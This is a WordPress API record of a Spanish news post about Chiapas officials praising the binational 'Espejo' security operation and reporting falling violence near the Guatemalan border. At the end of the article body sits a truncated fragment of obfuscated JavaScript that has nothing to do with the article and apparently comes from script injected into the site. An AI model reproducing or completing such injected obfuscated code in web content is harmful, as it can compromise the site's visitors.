{"id":24010,"date":"2025-09-15T04:21:38","date_gmt":"2025-09-15T04:21:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24010"},"modified":"2025-09-15T04:21:39","modified_gmt":"2025-09-15T04:21:39","slug":"destacan-implementacion-de-operativo-espejo-en-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24010","title":{"rendered":"Destacan implementaci\u00f3n de operativo Espejo en Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"366\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000334223.jpg\" alt=\"\" class=\"wp-image-24011\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000334223.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000334223-300x153.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>14 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- \u00d3scar Aparicio Avenda\u00f1o titular de la Secretar\u00eda de Seguridad del Pueblo destac\u00f3 la puesta en marcha de la operaci\u00f3n &#8220;Espejo&#8221;, un esfuerzo coordinado binacional entre M\u00e9xico y Guatemala. \u201cTenemos a trav\u00e9s del Ej\u00e9rcito Mexicano una operaci\u00f3n que se llama Espejo, que es una operaci\u00f3n coordinada entre Guatemala y Chiapas\u201d.<\/p>\n\n\n\n<p>Como parte de estos trabajos, se han implementado patrullajes constantes en los cuerpos de agua y afluentes de la frontera, con el apoyo de la Secretar\u00eda de Marina Armada de M\u00e9xico (SEMAR). \u201cEsto disminuy\u00f3 al 0%, ya no hemos tenido ning\u00fan cuerpo encontrado\u201d, asegur\u00f3 Aparicio Avenda\u00f1o.<\/p>\n\n\n\n<p>Los resultados, seg\u00fan el secretario, son evidentes en la regi\u00f3n. Mencion\u00f3 que tres operativos realizados en la zona fronteriza, espec\u00edficamente en Santa Teresa, Sabinalito y Pacayalito, han contribuido a un periodo de m\u00e1s de 40 d\u00edas sin homicidios en Frontera Comalapa. \u201cLa verdad es que no se hab\u00eda vivido algo as\u00ed como lo que estamos trabajando\u201d, recalc\u00f3.<\/p>\n\n\n\n<p>Aparicio Avenda\u00f1o enfatiz\u00f3 que este \u00e9xito es producto de un liderazgo unificado que incluye a la presidenta Claudia Sheinbaum Pardo a nivel federal, al secretario de Protecci\u00f3n Ciudadana, Omar Garc\u00eda Harfuch, y al gobernador del estado, Eduardo Ram\u00edrez Aguilar, quien encabeza la estrategia social.<\/p>\n\n\n\n<p>La presencia de las instituciones de seguridad, afirm\u00f3, ya es una realidad en todos los municipios de la entidad. \u201cHoy no hay un solo municipio en el estado de Chiapas que no trabajemos, que no tengamos presencia\u201d, declar\u00f3, tras relatar giras de trabajo recientes en municipios como Frontera Comalapa, Amatenango de la Frontera, Chicomuselo y la regi\u00f3n de La Frailesca.<\/p>\n\n\n\n<p>Uno de los indicadores m\u00e1s alentadores que report\u00f3 es la interrupci\u00f3n de los desplazamientos forzados que se ven\u00edan denunciando e, incluso, el retorno de familias que hab\u00edan huido a Guatemala. \u201cYa han retornado, porque tenemos que de hace 1 a\u00f1o o m\u00e1s empezaron a irse muchos de los familiares, hoy han regresado\u201d, afirm\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 14 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- \u00d3scar Aparicio Avenda\u00f1o titular de la Secretar\u00eda de Seguridad del Pueblo destac\u00f3 la puesta en marcha de la operaci\u00f3n &#8220;Espejo&#8221;, un esfuerzo coordinado binacional entre M\u00e9xico y Guatemala. \u201cTenemos a trav\u00e9s del Ej\u00e9rcito Mexicano una operaci\u00f3n que se llama Espejo, que es una operaci\u00f3n coordinada entre &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24011,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24010","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24010","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24010"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24010\/revisions"}],"predecessor-version":[{"id":24012,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24010\/revisions\/24012"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24011"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24010"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24010"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24010"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}